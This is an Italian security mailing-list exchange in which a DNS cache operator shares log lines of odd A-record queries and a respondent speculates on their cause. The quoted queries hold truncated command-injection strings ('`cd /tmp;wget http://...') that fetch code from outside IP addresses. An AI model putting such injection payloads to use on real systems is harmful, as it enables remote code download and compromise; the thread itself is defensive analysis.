On 02/14/2017 03:25 PM, Lorenzo Mainardi wrote: > Buonasera a tutti, > gestisco un server DNS cache per diverse migliaia di utenti broadband e mi > ritrovo nei log delle query di questo tipo: > > 15:11:14.531518 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9169+ A? `cd > /tmp;wget http://105.226.91.155. (53) > 15:11:14.549417 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9170+ A? `cd > /tmp;wget http://105.226.91.155. (53) > 15:11:14.567374 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9171+ A? `cd > /tmp;wget http://105.226.91.155. (53) > 15:11:17.792996 IP e.f.g.h.11783 > my.dns.cache.only.domain: 212+ A? `cd > /tmp;wget http://36.107.97.237:. (53) > 15:11:18.313564 IP a.b.c.e.11080 > my.dns.cache.only.domain: 1069+ A? `cd > /tmp;wget http://84.9.195.97:27. (53) > 15:11:26.300024 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1299+ A? `cd > /tmp;wget http://2.186.193.103:. (53) > 15:11:26.318653 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1300+ A? `cd > /tmp;wget http://2.186.193.103:. (53) > 15:11:26.337361 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1301+ A? `cd > /tmp;wget http://2.186.193.103:. (53) > > Che cosa pensate possano essere? Tentativi di command injection? > è la prima volta che mi capita di vedere delle query del genere. >
Uno script scritto male? Qualcuno sta provando a usare dei log per estrarre un IP e fare una query del record A, ed ha sbagliato il parsing della stringa? ;) Se è così, ti verrebbero tutte dallo stesso soggetto, gli IP possono essere IP magari dinamici associati allo stesso utente? -- Claudio Telmon [email protected] http://www.telmon.org ________________________________________________________ http://www.sikurezza.org - Italian Security Mailing List
